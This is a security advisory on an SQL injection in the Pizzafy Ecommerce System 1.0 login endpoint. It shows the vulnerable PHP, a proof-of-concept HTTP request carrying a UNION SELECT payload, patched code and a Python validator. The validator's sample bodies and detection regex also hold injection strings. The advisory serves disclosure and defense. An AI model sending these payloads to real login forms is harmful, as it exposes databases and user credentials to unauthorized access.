# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0

## Vulnerability Overview

- **Vulnerability Type**: Error-Based SQL Injection
- **Severity**: HIGH
- **Affected Version**: Pizzafy Ecommerce System 1.0
- **Vulnerability Location**: The `email` parameter of the login functionality is concatenated directly into a SQL statement without filtering or parameter binding, so attacker-controlled SQL is executed against the backend database.
- **Vulnerable Endpoint**: `/pizzafy/admin/ajax.php?action=login2`

## Impact Scope

| Impact Dimension | Description |
|------------------|-------------|
| Confidentiality | Full exposure of database structure and user credentials |
| Integrity | Unauthorized deletion or modification of records |
| Availability | Service unavailability due to large-scale data deletion |
| Privilege Escalation | Gaining administrator privileges via session data hijacking |

## Remediation Steps

1. **Use Prepared Statements**: Implement parameterized queries so user input is always bound as data, never interpolated into SQL.
2. **Input Validation**: Strictly validate and filter the `email` and `password` parameters (for example, reject anything that is not a well-formed e-mail address before it reaches the database layer).
3. **Database Permission Restrictions**: Limit the privileges of the application's database user to minimize potential damage.
4. **Monitoring and Logging**: Track and alert on anomalous query patterns.
5. **Security Testing**: Conduct regular penetration testing and code reviews.
6. **Error Handling**: Avoid exposing database-related error messages in responses.

## Vulnerable Code

```php
public function login2()
{
    $username = isset($_POST['email']) ? $_POST['email'] : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';

    // Vulnerable: the raw `email` value is interpolated into the SQL string.
    $sql = "SELECT * FROM user_info WHERE email = '$username'";
    $qry = $this->conn->query($sql);
    if (!$qry) {
        // Returns the raw database error to the client (error-based injection oracle).
        return $this->conn->error;
    }
    if ($qry && $qry->num_rows > 0) {
        $row = $qry->fetch_assoc();
        if (password_verify($password, $row['password'])) {
            $_SESSION['login_user_id']    = $row['user_id'];
            $_SESSION['login_first_name'] = $row['first_name'];
            $_SESSION['login_last_name']  = $row['last_name'];
            return 1;
        }
        // On a wrong password the whole selected row, including the stored hash, is returned.
        return json_encode($row);
    } else {
        return 2;
    }
}
```

## Proof of Concept (POC)

```http
POST /pizzafy/admin/ajax.php?action=login2 HTTP/1.1
Host: localhost
Content-Length: 64
sec-ch-ua: 
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/pizzafy/index.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt-BR;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=1fNk520basr12j78p8kcbg9d649
Connection: close

email=3' union select 1,version(),database(),user(),5,6,7&23&password=teste
```

## Remediated Code

```php
public function login2()
{
    $username = isset($_POST['email']) ? $_POST['email'] : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';

    // Parameterized query: the email value is bound as data and never becomes part of the SQL text.
    $stmt = $this->conn->prepare("SELECT * FROM user_info WHERE email = ?");
    if (!$stmt) {
        // Log server-side only; database errors are not echoed to the client (remediation step 6).
        error_log('login2: prepare failed: ' . $this->conn->error);
        return 2;
    }
    $stmt->bind_param("s", $username);
    $stmt->execute();
    $qry = $stmt->get_result();
    if (!$qry) {
        error_log('login2: execute failed: ' . $stmt->error);
        return 2;
    }
    if ($qry->num_rows > 0) {
        $row = $qry->fetch_assoc();
        if (password_verify($password, $row['password'])) {
            $_SESSION['login_user_id']    = $row['user_id'];
            $_SESSION['login_first_name'] = $row['first_name'];
            $_SESSION['login_last_name']  = $row['last_name'];
            return 1;
        }
    }
    // Unknown user and wrong password share one response: the row is never returned
    // and the endpoint cannot be used to enumerate accounts.
    return 2;
}
```
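Remediation steps 2 and 4 above (input validation and monitoring) can be exercised independently of the PHP code. The following Python is an added example, not part of the advisory or of Pizzafy: it applies an allow-list check to the `email` parameter of a login body and flags bodies that carry SQL fragments, so it can gate requests before the database layer or be run over captured request bodies during log review. The sample bodies are constructed for the example; the second one mirrors the shape of the proof of concept above.

```python
import re
from urllib.parse import parse_qs

# Constructed sample bodies for POST /pizzafy/admin/ajax.php?action=login2.
SAMPLE_BODIES = [
    "email=alice%40example.com&password=s3cret",
    "email=3' union select 1,version(),database(),user(),5,6,7&password=teste",
    "email=bob%40example.com' or '1'='1&password=x",
]

# Conservative e-mail shape: one '@', no quotes, comment markers or whitespace.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
# Fragments that never belong in an e-mail address but do appear in injection attempts.
SQL_MARKERS = re.compile(
    r"(?i)(['\"]|--|/\*|\bunion\b|\bselect\b|\bor\b\s+['\d]|\bsleep\s*\(|information_schema)"
)


def validate_email(value: str) -> bool:
    """Allow-list check for the login `email` parameter (step 2)."""
    return len(value) <= 254 and EMAIL_RE.match(value) is not None


def classify_login_body(body: str) -> dict:
    """Classify one urlencoded login body as 'ok' or 'suspicious' with reasons.

    Meant as a request gate or log-review aid (step 4); it complements, and does
    not replace, the prepared statement in the remediated code.
    """
    params = parse_qs(body, keep_blank_values=True)
    email = params.get("email", [""])[0]
    reasons = []
    if not validate_email(email):
        reasons.append("email fails allow-list")
    if SQL_MARKERS.search(email):
        reasons.append("sql marker in email")
    verdict = "suspicious" if reasons else "ok"
    return {"email": email, "verdict": verdict, "reasons": reasons}


def review_bodies(bodies):
    """Run the classifier over a list of captured bodies and return the results."""
    return [classify_login_body(b) for b in bodies]


if __name__ == "__main__":
    for result in review_bodies(SAMPLE_BODIES):
        print(result["verdict"], result["reasons"], repr(result["email"]))
```

A `suspicious` verdict on this endpoint is a high-signal alert, since a legitimate login never carries quotes or SQL keywords in the e-mail field.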